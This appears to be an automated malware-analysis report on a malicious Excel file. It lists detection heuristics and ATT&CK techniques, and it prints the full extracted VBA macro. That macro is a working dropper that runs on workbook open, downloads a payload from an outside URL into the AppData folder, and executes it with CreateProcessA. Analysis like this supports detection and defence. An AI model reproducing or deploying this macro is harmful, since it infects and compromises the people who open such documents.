MALICIOUS
258
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is an Excel document containing VBA macros. A critical heuristic indicates the use of URLDownloadToFile within VBA, and the script itself contains API calls for CreateProcessA and URLDownloadToFile. This strongly suggests the macro's purpose is to download and execute a second-stage payload from the embedded URL http://kredytinksao.pl/raw.txt.
Heuristics 8
-
ClamAV: Xls.Dropper.Agent-7592644-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7592644-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _ -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Ret3 = Environ$("APPDATA") + "\pay1.ps1" -
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://kredytinksao.pl/raw.txt Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4347 bytes |
SHA-256: 0a76635d9e9c190852b60a09ee16303ffa0f9e73d53eafe1772387962048cd0e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Ten_skoroszyt"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'asdf
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
'asdf
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
'asdf
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
'asdf
'aa
'll
Private Type OVERLAPPED
Internal As Long
InternalHigh As Long
offset As Long
OffsetHigh As Long
hEvent As Long
End Type
'lkl
'jkjkj
Private Declare PtrSafe Function DeleteFileA Lib "kernel32.dll" _
(ByVal lpFileName As String) As Long
Private Declare PtrSafe Function CreateProcessA Lib "kernel32.dll" _
(ByVal lpApplicationName As String, _
ByVal lpCommandLine As String, _
ByVal lpProcessAttributes As Long, _
ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Boolean, _
ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, _
ByVal lpCurrentDirectory As String, _
ByRef lpStartupInfo As STARTUPINFO, _
ByRef lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
(ByVal pCaller As Long, _
ByVal szUrl As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function CreateFileA Lib "kernel32" _
(ByVal lpFileName As String, _
ByVal dwDesiredAccess As Long, _
ByVal dwShareMode As Long, _
lpSecurityAttributes As SECURITY_ATTRIBUTES, _
ByVal dwCreationDisposition As Long, _
ByVal dwFlagsAndAttributes As Long, _
ByVal hTemplateFile As Long) As Long
'hhh
''
Private Declare PtrSafe Function ReadFile Lib "kernel32" _
(ByVal hFile As Long, _
ByVal lpBuffer As String, _
ByVal nNumberOfBytesToRead As Long, _
lpNumberOfBytesRead As Long, _
lpOverlapped As OVERLAPPED) As Long
Private Declare PtrSafe Function SetFilePointer Lib "kernel32" _
(ByVal hFile As Long, _
ByVal lDistanceToMove As Long, _
ByVal lpDistanceToMoveHigh As Long, _
ByVal dwMoveMethod As Long) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long
Private Const GENERIC_READ = &H80000000
Private Const OPEN_EXISTING = &H3&
Private Const FILE_ATTRIBUTE_NORMAL = &H80&
Sub Workbook_Open()
Dim si As STARTUPINFO
Dim pi As PROCESS_INFORMATION
si.cb = Len(si)
Dim Ret As Long
'
Dim Ret2 As Long
Dim Ret3 As String
'
Dim Ret4 As Integer
Dim Ret6 As Long
'
Dim Ret8 As Long
Dim Ret7 As Long
'
Dim Ret9 As String * 4096
Dim Ret10 As Long
Dim sa As SECURITY_ATTRIBUTES
Dim ov As OVERLAPPED
ov.hEvent = &H0
Ret3 = Environ$("APPDATA") + "\pay1.ps1"
Ret2 = URLDownloadToFileA(0, "http://kredytinksao.pl/raw.txt", Ret3, 0, 0)
sa.nLength = Len(sa)
'fghjfghjfghj
'fgjf
Ret7 = CreateFileA(Ret3, 1, 2, sa, 3, 0, 0)
Result = SetFilePointer(Ret7, 10, 0, 0)
Result = ReadFile(Ret7, Ret9, 4096, Ret6, ov)
Ret10 = CloseHandle(Ret7)
Ret = CreateProcessA(vbNullString, Ret9, ByVal 0&, ByVal 0&, True, 32, ByVal 0&, vbNullString, si, pi)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.